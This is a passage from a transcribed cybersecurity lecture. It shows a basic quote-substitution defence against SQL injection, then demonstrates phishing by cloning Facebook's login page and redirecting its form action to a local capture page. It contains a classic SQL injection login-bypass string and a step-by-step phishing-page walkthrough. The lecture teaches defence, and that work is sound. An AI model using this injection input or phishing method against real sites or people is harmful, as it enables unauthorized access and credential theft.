01:19:11,380 --> 01:19:15,610 So now it starts out exactly the same, x equals something, y equals something. 1476 01:19:15,610 --> 01:19:18,640 But I'm making a pretty basic substitution. 1477 01:19:18,640 --> 01:19:23,020 I'm replacing every time that I see single quotes with double quotes. 1478 01:19:23,020 --> 01:19:25,050 So I'm replacing every instance of single quote, 1479 01:19:25,050 --> 01:19:26,800 and I have to preface it with a backslash. 1480 01:19:26,800 --> 01:19:30,160 Because notice I'm actually using single quotes to identify the character. 
1481 01:19:30,160 --> 01:19:33,880 It just so happens that it's to indicate that I'm trying to substitute something 1482 01:19:33,880 --> 01:19:35,350 which I'm putting in single quotes. 1483 01:19:35,350 --> 01:19:38,440 The thing I'm trying to substitute actually is a single quote, 1484 01:19:38,440 --> 01:19:42,130 and so I need to put a backslash in front of it 1485 01:19:42,130 --> 01:19:44,440 to escape that character such that it actually 1486 01:19:44,440 --> 01:19:48,310 gets treated as a single quotation mark character as opposed 1487 01:19:48,310 --> 01:19:50,308 to some special Python-- 1488 01:19:50,308 --> 01:19:52,850 Python's not going to try and interpret it in some other way. 1489 01:19:52,850 --> 01:19:56,890 So I want to replace every instance of a single quote in x with a double quote, 1490 01:19:56,890 --> 01:20:00,010 and I want to replace every instance of a single quote in y 1491 01:20:00,010 --> 01:20:01,030 with a double quote. 1492 01:20:01,030 --> 01:20:02,650 Now, why do I want to do that? 1493 01:20:02,650 --> 01:20:07,240 Because notice in my actual Python string here 1494 01:20:07,240 --> 01:20:12,670 I'm using single quotes to set off the variables for purposes 1495 01:20:12,670 --> 01:20:14,290 of SQL's interpretation of them. 1496 01:20:14,290 --> 01:20:16,520 So where the user name equals this string, 1497 01:20:16,520 --> 01:20:18,830 I'm using single quotes to do that. 1498 01:20:18,830 --> 01:20:23,920 So if my username or my password also contained single quotation mark 1499 01:20:23,920 --> 01:20:27,430 characters, when SQL was interpreting it, 1500 01:20:27,430 --> 01:20:32,080 it might think that the next single quote character it sees is the end. 1501 01:20:32,080 --> 01:20:34,300 I'm done with what I've prompted. 1502 01:20:34,300 --> 01:20:37,420 And that's exactly how I tricked it in the previous example. 
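The substitution in login2.py, as described, can be sketched like this. As with the earlier file, this is a reconstruction from the spoken description: the function names sanitize and build_query are made up, and the values are passed in directly instead of being read with input().

```python
def sanitize(value):
    # '\'' is a one-character string holding a single quote; the backslash
    # escapes it so Python does not treat it as the end of the string.
    return value.replace('\'', '"')


def build_query(x, y):
    x = sanitize(x)
    y = sanitize(y)
    return f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'"


# The typed single quotes become double quotes, so the only single quotes
# left in the query are the ones the program itself wrote.
print(build_query("Doug", "1' OR '1' = '1"))
```

With the quotes replaced, everything the user typed stays inside one pair of single quotes and is treated as a single password value.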
1503 01:20:37,420 --> 01:20:40,930 I used that first single quote, which seemed kind of random and out 1504 01:20:40,930 --> 01:20:44,380 of nowhere, to trick SQL into thinking I'm done with this. 1505 01:20:44,380 --> 01:20:48,850 Then I used the keyword OR, back now in SQL and not in some string 1506 01:20:48,850 --> 01:20:52,570 that I'm searching for, and then I would continue this trick going forward. 1507 01:20:52,570 --> 01:20:55,732 So this is designed to eliminate all the single quotes, 1508 01:20:55,732 --> 01:20:57,940 because the single quotes mean something very special 1509 01:20:57,940 --> 01:21:01,510 in the context of my SQL query itself. 1510 01:21:01,510 --> 01:21:06,610 If you're actually using SQL libraries that are tied into Python, 1511 01:21:06,610 --> 01:21:11,108 the ability to replace things is much more robust than this example. 1512 01:21:11,108 --> 01:21:12,900 But even this very simple example where I'm 1513 01:21:12,900 --> 01:21:16,480 doing just this very basic substitution is good enough 1514 01:21:16,480 --> 01:21:20,390 to get around the injection attack that we just looked at. 1515 01:21:20,390 --> 01:21:23,350 So this is now in login2.py. 1516 01:21:23,350 --> 01:21:24,520 Let's do this. 1517 01:21:24,520 --> 01:21:26,895 Let's run python login2.py. 1518 01:21:26,895 --> 01:21:28,270 And we'll start out the same way. 1519 01:21:28,270 --> 01:21:30,890 We'll do Doug and 12345. 1520 01:21:30,890 --> 01:21:32,895 And it appears that nothing has changed. 1521 01:21:32,895 --> 01:21:35,020 The behavior is otherwise identical because I'm not 1522 01:21:35,020 --> 01:21:36,730 trying to do any tricks like that. 1523 01:21:36,730 --> 01:21:41,440 SELECT star from users where username equals Doug and password equals 12345.
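The substitution described here can be sketched roughly as follows. The files login.py and login2.py are not reproduced in this transcript, so the function names and the exact query text below are assumptions for illustration; only the table name, the column names, and the single-quote-to-double-quote replacement come from the lecture.

```python
def build_query_unsafe(username: str, password: str) -> str:
    """Build the query by pasting user input directly between single quotes.

    Hypothetical stand-in for the first login file: any single quote in the
    input ends the SQL string early, so the rest is read as SQL.
    """
    return (
        "SELECT * FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def build_query_substituted(username: str, password: str) -> str:
    """Replace every single quote with a double quote before building the query.

    Hypothetical stand-in for login2.py. The backslash escapes the single
    quote inside a single-quoted Python string, as described in the lecture.
    """
    username = username.replace('\'', '"')
    password = password.replace('\'', '"')
    return build_query_unsafe(username, password)


if __name__ == "__main__":
    trick = "1' OR '1' = '1"
    print(build_query_unsafe("Doug", trick))       # input escapes the quotes
    print(build_query_substituted("Doug", trick))  # input stays one string
```

With the substitution in place, the whole attempted trick stays inside one pair of single quotes, so SQL treats it as a single (wrong) password rather than as an extra OR condition.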
1524 01:21:41,440 --> 01:21:45,250 But if I now try that same trick that I did a moment ago, 1525 01:21:45,250 --> 01:21:55,090 so password is 1' or '1' equals '1 and I hit Enter, 1526 01:21:55,090 --> 01:21:59,020 now I'm not subject to that same SQL injection anymore because I'm trying 1527 01:21:59,020 --> 01:22:02,800 to select all the information from the users table where the username is Doug 1528 01:22:02,800 --> 01:22:03,970 and the password equals-- 1529 01:22:03,970 --> 01:22:06,950 And notice that here is the first single quote. 1530 01:22:06,950 --> 01:22:08,440 Here is the second one. 1531 01:22:08,440 --> 01:22:11,770 So it's thinking that entire thing now is the password. 1532 01:22:11,770 --> 01:22:20,468 Only if my password is literally 1" or "1" equals "1, 1533 01:22:20,468 --> 01:22:22,010 then I would be literally logging in. 1534 01:22:22,010 --> 01:22:23,980 If that happened to be my password, this would work. 1535 01:22:23,980 --> 01:22:25,150 But otherwise I've escaped. 1536 01:22:25,150 --> 01:22:28,630 I've stopped the adversary from being able to leverage 1537 01:22:28,630 --> 01:22:33,080 a simple trick like this to break in to my database 1538 01:22:33,080 --> 01:22:34,930 when perhaps they're not intended to do so. 1539 01:22:34,930 --> 01:22:41,140 And again, in actual SQL injection defense, the substitutions that we make 1540 01:22:41,140 --> 01:22:42,640 are much more complicated than this. 1541 01:22:42,640 --> 01:22:45,932 We're not just looking for single quote characters and double quote characters, 1542 01:22:45,932 --> 01:22:48,610 but we're considering semicolons or any other special characters 1543 01:22:48,610 --> 01:22:51,460 that SQL would interpret as part of a statement. 
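In practice, SQL libraries for Python usually avoid hand-written substitution altogether by passing user input separately from the query text. A minimal sketch of that idea, assuming the standard-library sqlite3 module (the lecture does not name a specific library) and a hypothetical in-memory users table:

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with one user (illustration only).

    Storing a plaintext password is done here purely to mirror the lecture's
    example; it is not a recommended practice.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("Doug", "12345"),
    )
    return conn


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Return True only if a row matches both values exactly.

    The ? placeholders make sqlite3 treat the inputs as data, never as SQL,
    so quotes or semicolons in the input cannot change the query's structure.
    """
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None
```

Here the injection string from the demonstration is simply compared against the stored password as ordinary text, so the login attempt fails.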
1544 01:22:51,460 --> 01:22:53,900 We can escape those out so that users could literally 1545 01:22:53,900 --> 01:22:59,720 use single quotes or semicolons or the like in their passwords 1546 01:22:59,720 --> 01:23:03,160 without necessarily compromising the integrity of the entire database 1547 01:23:03,160 --> 01:23:04,510 overall. 1548 01:23:04,510 --> 01:23:08,480 So we've taken a look at several of the most common, most obvious ways 1549 01:23:08,480 --> 01:23:11,180 that an adversary might be able to extract information 1550 01:23:11,180 --> 01:23:13,910 either from a business or an individual. 1551 01:23:13,910 --> 01:23:17,660 And these ways are kind of attention-getting in some context. 1552 01:23:17,660 --> 01:23:19,880 But let's focus now-- let's go back and bring things 1553 01:23:19,880 --> 01:23:22,280 full circle to something I've mentioned many times, 1554 01:23:22,280 --> 01:23:28,400 which is humans are the core fatal flaw in all of these security things 1555 01:23:28,400 --> 01:23:29,800 that we're dealing with here. 1556 01:23:29,800 --> 01:23:31,800 And so let's bring things full circle by talking 1557 01:23:31,800 --> 01:23:34,220 about phishing, what phishing is. 1558 01:23:34,220 --> 01:23:39,140 So phishing is just an attempt by an adversary to prey upon us 1559 01:23:39,140 --> 01:23:45,440 and our unfortunate general ignorance of basic security protocols. 1560 01:23:45,440 --> 01:23:47,900 So it's just an attempt to socially engineer, 1561 01:23:47,900 --> 01:23:49,730 basically, information out of someone. 1562 01:23:49,730 --> 01:23:52,460 You pretend to be someone that you are not. 1563 01:23:52,460 --> 01:23:54,710 And if you do so convincingly enough, you 1564 01:23:54,710 --> 01:23:58,190 might be able to extract information about that person. 1565 01:23:58,190 --> 01:24:01,053 Now, phishing you'll also see in other contexts that are-- 1566 01:24:01,053 --> 01:24:03,470 computer scientists like to be clever with their wordplay. 
1567 01:24:03,470 --> 01:24:06,800 You'll see things like netting, which is basically a phishing attack that 1568 01:24:06,800 --> 01:24:08,780 launches against many people at once, hoping 1569 01:24:08,780 --> 01:24:11,060 they'll be able to get one or two. 1570 01:24:11,060 --> 01:24:13,400 There's spear phishing, which is a phishing 1571 01:24:13,400 --> 01:24:17,240 attack that targets one specific person trying to get information from them. 1572 01:24:17,240 --> 01:24:20,090 And then there's whaling, which is a phishing attack that 1573 01:24:20,090 --> 01:24:23,330 is targeted against somebody who is perceived to have a lot of information 1574 01:24:23,330 --> 01:24:25,413 or whose information is particularly valuable such 1575 01:24:25,413 --> 01:24:28,820 that you'd be phishing for some big whale. 1576 01:24:28,820 --> 01:24:31,730 Now, one of the most obvious and easy types of phishing attack 1577 01:24:31,730 --> 01:24:32,900 looks like this. 1578 01:24:32,900 --> 01:24:35,450 It's a simple URL substitution. 1579 01:24:35,450 --> 01:24:39,590 This is how we can write a link in HTML. 1580 01:24:39,590 --> 01:24:43,480 A is the HTML tag for anchor, which we use for hyperlinks. 1581 01:24:43,480 --> 01:24:46,460 Href is where we are going to. 1582 01:24:46,460 --> 01:24:50,660 And then we also have the ability to specify some text at the end of that. 1583 01:24:50,660 --> 01:24:54,830 These two items do not have to match, as you can see here. 1584 01:24:54,830 --> 01:25:02,750 I can say we're going to URL2 but actually send you to URL1. 1585 01:25:02,750 --> 01:25:08,420 This is an incredibly common way to get information from somebody. 1586 01:25:08,420 --> 01:25:12,830 They think they're going one place but they're actually going someplace else. 
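The mismatch between a link's visible text and its href can also be checked mechanically. The following is a rough defensive sketch, not a complete detector: the class and function names are hypothetical, the .example domains are placeholders, and it only flags links whose visible text itself looks like a web address.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a href=...> tag."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Return the lowercase hostname, tolerating text without a scheme."""
    if "//" not in url:
        url = "//" + url
    return (urlparse(url).hostname or "").lower()


def mismatched_links(html: str):
    """Return links whose URL-like visible text names a different host."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    return [
        (href, text)
        for href, text in collector.links
        if "." in text and " " not in text and host_of(text) != host_of(href)
    ]
```

A link that displays https://url2.example but points at https://url1.example/login would be reported, while ordinary text such as "Click here" is ignored. Differences such as a leading "www." would also be flagged, which is a limitation of this simple comparison.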
1587 01:25:12,830 --> 01:25:16,430 And to show you, as a very basic example, just how easy it 1588 01:25:16,430 --> 01:25:21,560 is to potentially trick somebody into going somewhere they're not supposed to 1589 01:25:21,560 --> 01:25:25,220 and potentially then revealing credentials as well, 1590 01:25:25,220 --> 01:25:28,580 let's just take a simple example here with Facebook. 1591 01:25:28,580 --> 01:25:31,970 And why don't we just take a moment to build our own version of Facebook 1592 01:25:31,970 --> 01:25:36,410 and see if we can't get somebody to potentially reveal information to us? 1593 01:25:36,410 --> 01:25:38,750 So let's imagine that I have acquired some domain 1594 01:25:38,750 --> 01:25:41,390 name that's really similar to Facebook.com, 1595 01:25:41,390 --> 01:25:44,150 like it's off by one character. 1596 01:25:44,150 --> 01:25:45,350 It's a common typo. 1597 01:25:45,350 --> 01:25:48,198 For example fs maybe is a common thing. 1598 01:25:48,198 --> 01:25:49,990 People mistype the A or something like that 1599 01:25:49,990 --> 01:25:54,800 that would be really not necessarily obvious to somebody at the outset. 1600 01:25:54,800 --> 01:25:59,240 One way that I might be able to just take advantage of somebody's thinking 1601 01:25:59,240 --> 01:26:01,670 that they're logging into Facebook is to make a page that 1602 01:26:01,670 --> 01:26:05,150 looks exactly the same as Facebook. 1603 01:26:05,150 --> 01:26:07,640 That's actually not very difficult to do. 1604 01:26:07,640 --> 01:26:09,680 All you have to do is open up Facebook here. 
1605 01:26:09,680 --> 01:26:14,720 And because its HTML is available to me, I can right click on it, 1606 01:26:14,720 --> 01:26:18,530 view page source, take a second to load here-- 1607 01:26:18,530 --> 01:26:20,480 Facebook is a pretty big site-- 1608 01:26:20,480 --> 01:26:27,080 and then I can just control A, copy, select all, copy all of the content, 1609 01:26:27,080 --> 01:26:33,500 and paste this in to my index.html, and we will save. 1610 01:26:33,500 --> 01:26:36,140 1611 01:26:36,140 --> 01:26:40,970 And then we'll head back into our terminal here, 1612 01:26:40,970 --> 01:26:45,170 and I will start Chrome on the file index.html, which 1613 01:26:45,170 --> 01:26:49,400 is the file that I literally just saved my Facebook information in. 1614 01:26:49,400 --> 01:26:51,040 So start Chrome index.html. 1615 01:26:51,040 --> 01:26:53,360 You'll notice that it brings me to this URL 1616 01:26:53,360 --> 01:26:56,670 here, which is the file for where I currently live, 1617 01:26:56,670 --> 01:26:58,310 or where this file currently lives. 1618 01:26:58,310 --> 01:27:00,920 And this page looks like Facebook, except for the fact that, 1619 01:27:00,920 --> 01:27:04,220 when I log in, I then get redirected back 1620 01:27:04,220 --> 01:27:07,370 to something that actually is Facebook and is not something that I control. 1621 01:27:07,370 --> 01:27:10,820 But at the outset, my page here at the very beginning 1622 01:27:10,820 --> 01:27:14,810 looks identical to Facebook. 1623 01:27:14,810 --> 01:27:16,790 Now, the trick here would be to do something 1624 01:27:16,790 --> 01:27:20,780 so that the user would provide information here in the email box 1625 01:27:20,780 --> 01:27:24,397 and then here in the password field such that when they click Login, 1626 01:27:24,397 --> 01:27:26,480 I might be able to get that information from them. 1627 01:27:26,480 --> 01:27:30,500 Maybe I just am waiting to capture their information. 
1628 01:27:30,500 --> 01:27:35,450 So the next step for me might be to go back into my random set of stuff here. 1629 01:27:35,450 --> 01:27:38,570 There's a lot of random code that we don't really care about. 1630 01:27:38,570 --> 01:27:41,030 But the one thing I do care about is what happens when 1631 01:27:41,030 --> 01:27:43,790 somebody clicks on this Login button. 1632 01:27:43,790 --> 01:27:45,590 That is interesting to me. 1633 01:27:45,590 --> 01:27:48,230 So I'm going to go through this and just do control F, 1634 01:27:48,230 --> 01:27:51,968 control F just being find, the string login. 1635 01:27:51,968 --> 01:27:54,260 That's the text that's literally written on the button, 1636 01:27:54,260 --> 01:27:55,843 so hopefully I'll find that somewhere. 1637 01:27:55,843 --> 01:27:58,160 I'm told I have eight results. 1638 01:27:58,160 --> 01:27:59,990 So this is, if I just kind of look around 1639 01:27:59,990 --> 01:28:01,698 for context to try and figure out where I 1640 01:28:01,698 --> 01:28:05,660 am in the code, the title of something, so that's probably not it. 1641 01:28:05,660 --> 01:28:07,180 So I don't want to go there. 1642 01:28:07,180 --> 01:28:10,640 Create an account or login, not quite what I'm looking for. 1643 01:28:10,640 --> 01:28:12,620 So go the next one. 1644 01:28:12,620 --> 01:28:15,890 OK, here we go, input value equals login. 1645 01:28:15,890 --> 01:28:18,680 So now I found an input that is called login. 1646 01:28:18,680 --> 01:28:22,110 So this is presumably a button that's presumably part of some form. 1647 01:28:22,110 --> 01:28:25,820 So if I scroll up a little bit higher, hopefully I 1648 01:28:25,820 --> 01:28:29,570 will find a form, which I do, form ID. 1649 01:28:29,570 --> 01:28:30,920 And it has an action. 1650 01:28:30,920 --> 01:28:34,040 The action is to go to this particular page, 1651 01:28:34,040 --> 01:28:37,310 facebook.com/login/ and so on and so on. 
1652 01:28:37,310 --> 01:28:39,820 But maybe I want to send it somewhere else. 1653 01:28:39,820 --> 01:28:44,000 So if I replace this entire URL with where I actually want to send the user, 1654 01:28:44,000 --> 01:28:46,160 where maybe I'm going to capture their information, 1655 01:28:46,160 --> 01:28:49,220 maybe I'll store this in login.html. 1656 01:28:49,220 --> 01:28:51,140 And so that's what's going to come in here. 1657 01:28:51,140 --> 01:28:56,210 And then we'll save the file such that our changes have been captured. 1658 01:28:56,210 --> 01:28:58,370 So presumably what should happen is now, when 1659 01:28:58,370 --> 01:29:02,420 you click on the Login button in my fake Facebook, 1660 01:29:02,420 --> 01:29:08,000 you instead get redirected to login.html rather than the Facebook actual login 1661 01:29:08,000 --> 01:29:10,458 as we saw just a moment ago. 1662 01:29:10,458 --> 01:29:11,250 So let's try again. 1663 01:29:11,250 --> 01:29:14,870 We'll go back here to our fake Facebook page. 1664 01:29:14,870 --> 01:29:18,880 We will refresh so that we get our new content. 1665 01:29:18,880 --> 01:29:20,860 Remember, we just changed the HTML content, 1666 01:29:20,860 --> 01:29:23,900 so we actually need to reload it so that our browser has it. 1667 01:29:23,900 --> 01:29:31,250 And we'll type in abc@cs50.net and then some password here and click Login, 1668 01:29:31,250 --> 01:29:32,990 and we get redirected here. 1669 01:29:32,990 --> 01:29:35,630 Sorry, we are unable to log you in at this time. 1670 01:29:35,630 --> 01:29:38,270 But notice we're still in a file that I created. 1671 01:29:38,270 --> 01:29:41,973 I didn't show you login.html, but that's exactly what I put there. 1672 01:29:41,973 --> 01:29:44,390 Now, I'm not actually going to phish for information here. 
1673 01:29:44,390 --> 01:29:46,370 And I'm not going to do something that would arguably vio-- 1674 01:29:46,370 --> 01:29:48,100 even though I'm using fake data here, I'm 1675 01:29:48,100 --> 01:29:50,808 not going to do something that would violate the terms of service 1676 01:29:50,808 --> 01:29:54,500 or get myself in trouble by actually attempting to do some phishing here. 1677 01:29:54,500 --> 01:29:58,070 But imagine instead of some HTML I had some Python code that was 1678 01:29:58,070 --> 01:30:00,740 able to read the data from that field. 1679 01:30:00,740 --> 01:30:02,840 We saw that a moment ago with passwords, right? 1680 01:30:02,840 --> 01:30:06,860 We know that the possibility exists that if the user types something 1681 01:30:06,860 --> 01:30:10,850 into a field, we have the ability to extract it. 1682 01:30:10,850 --> 01:30:13,340 What I could do here is very simple. 1683 01:30:13,340 --> 01:30:18,200 I could just read those two fields where they typed a username and a password 1684 01:30:18,200 --> 01:30:20,032 but then display this content. 1685 01:30:20,032 --> 01:30:22,490 Perhaps it's been the case that you've gone to some website 1686 01:30:22,490 --> 01:30:26,300 and seen, oh, yeah, sorry, the server can't handle this request right now, 1687 01:30:26,300 --> 01:30:28,820 or something along those lines. 1688 01:30:28,820 --> 01:30:30,650 And you maybe think nothing of it. 1689 01:30:30,650 --> 01:30:33,530 Or maybe I even would then have a link here that says, try again. 1690 01:30:33,530 --> 01:30:35,870 And if you click Try Again, it would bring you back 1691 01:30:35,870 --> 01:30:39,860 to Facebook's actual login where you would then enter your credentials 1692 01:30:39,860 --> 01:30:42,560 and try again and perhaps think everything was fine.
1693 01:30:42,560 --> 01:30:46,520 But if on this login page I had extracted your username and password 1694 01:30:46,520 --> 01:30:49,120 by tricking you into thinking you were logging into Facebook, 1695 01:30:49,120 --> 01:30:51,203 and then maybe I saved those in some file somewhere 1696 01:30:51,203 --> 01:30:54,882 and then just displayed this to you, you think, ah, they just had an error. 1697 01:30:54,882 --> 01:30:56,090 Things are a little bit busy. 1698 01:30:56,090 --> 01:30:57,050 I'll try again. 1699 01:30:57,050 --> 01:30:58,910 And when you try again, it works. 1700 01:30:58,910 --> 01:31:00,770 It's really that easy. 1701 01:31:00,770 --> 01:31:05,600 And the way to avoid phishing expeditions, so to speak, 1702 01:31:05,600 --> 01:31:07,530 is just to be mindful of what you're doing. 1703 01:31:07,530 --> 01:31:11,000 Take a look at the URL bar to make sure that you're on the page 1704 01:31:11,000 --> 01:31:12,983 that you think you're on. 1705 01:31:12,983 --> 01:31:14,900 Hopefully you've come away now with a bit more 1706 01:31:14,900 --> 01:31:16,775 of an understanding of cybersecurity and some 1707 01:31:16,775 --> 01:31:19,700 of the best practices that are put in place to deal 1708 01:31:19,700 --> 01:31:21,740 with potential cybersecurity threats. 1709 01:31:21,740 --> 01:31:24,320 Now it's incumbent upon us to use the technology 1710 01:31:24,320 --> 01:31:28,130 that we have available to help us protect ourselves from ourselves, 1711 01:31:28,130 --> 01:31:33,020 and not only ourselves and our own data, but also to work to protect our clients 1712 01:31:33,020 --> 01:31:35,200 and their data as well. 1713 01:31:35,200 --> 01:31:36,533